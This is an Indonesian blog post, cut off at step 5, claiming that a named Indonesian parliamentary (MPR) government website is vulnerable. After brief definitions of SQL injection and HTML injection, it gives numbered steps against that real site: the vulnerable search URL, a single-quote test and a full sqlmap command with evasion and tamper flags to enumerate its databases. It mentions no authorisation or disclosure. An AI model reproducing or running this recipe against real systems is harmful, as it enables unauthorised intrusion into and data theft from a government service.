Langsung ke konten utama

Postingan

Menampilkan postingan dari Oktober, 2020

Website Majelis Perwakilan Rakyat (MPR) Vulnerable

Apa itu Sql Injection dan HTML Injection??. SQLI singkatnya adalah teknik yang menyalahgunakan celah yang terjadi dalam lapisan database aplikasi atau website. HTML Injection sebenarnya masih kakak adek dengan Cross Site Scripting (XSS). yaitu celah keamanan untuk menginjeksi kode HTML ke dalam halaman website...lob loh...buat apa kaka?...(baca: guugel.com) kemungkinan teman-teman sudah tidak asing dengan method (metode) tersebut, jadi langsung saja tanpa basah basah basi...cokicokicroot. A. ppid.mpr.go.id SQL Injection 1. akses website : ppid.mpr.go.id/id 2. arahkan ke url : https://ppid.mpr.go.id/berita/semuaberita?cari= 3. pastinya kita perlu mencheck respon dari webs tersebut apakah true atau false, dengan memasukan tanda ('). 4. Tinggal mengeseks_usi dengan SQLMAP command sqlmap : python sqlmap.py -u https://ppid.mpr.go.id/berita/semuaberita?cari=12 --dbs --random-agent --flush-session --technique=BEUS --time-sec=2 --tamper=space2comment --ignore-proxy --dbms=mysql 5. Silahkan